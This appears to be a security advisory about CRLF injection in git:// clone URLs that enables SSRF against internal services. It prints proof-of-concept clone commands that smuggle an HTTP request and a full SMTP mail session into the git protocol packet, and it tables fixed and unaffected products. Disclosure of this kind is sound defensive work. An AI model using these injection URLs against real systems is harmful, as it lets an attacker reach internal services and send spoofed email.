About
Blog
Donate
Gaming
Network
Projects

Description

When we connect to a server with git:// protocol, server, we send an initial request packet that looks something like:

002dgit-upload-pack repo.git\0host=example.com

When the repository contains a newline on it, the git clone command also includes the newline (CR, LF) to the packet.

002egit-upload-pack repo
.git\0host=example.com

It looks fine at first sight, but the main problem with this is that it is possible to send packets to other ports to communicate with other protocols, which can lead to possibility of SSRF attack on internal services.

For example, running commands like the following

$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'

will eventually send the following packet to localhost:1234.

0050git-upload-pack /
GET / HTTP/1.1
Host:localhost

host=localhost:1234

We can somewhat create some sophisticated pro With this way, it is possible to send some SMTP packets like the following code and send e-mails over SMTP protocol.

$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%[email protected]%3E%0d%0aRCPT%20TO%3A%[email protected]%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%0d%0aTo%3A%20%[email protected]%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'

Patch Status

  • git/git has been fixed appropriately.

  • Softwares that rely on git clone may be affected by this vulnerability.

Affected Products

Product NameCurrent StatusReference
gitFixed@a02ea577
KallitheaFixedRelease Notes v0.63
GogsFixedPlans to fix in upcoming release (v0.13)
GiteaFixedRelease v1.12.6
BitBucketMitigatedBounty awarded: P3

Unaffected Products

Product NameReason
GitHubGit protocol is not supported
GiteePort part is filtered, which leads to no impact
GogsCRLF characters were filtered
          

a286e487f0a2455b
b7917adecfbc3b2c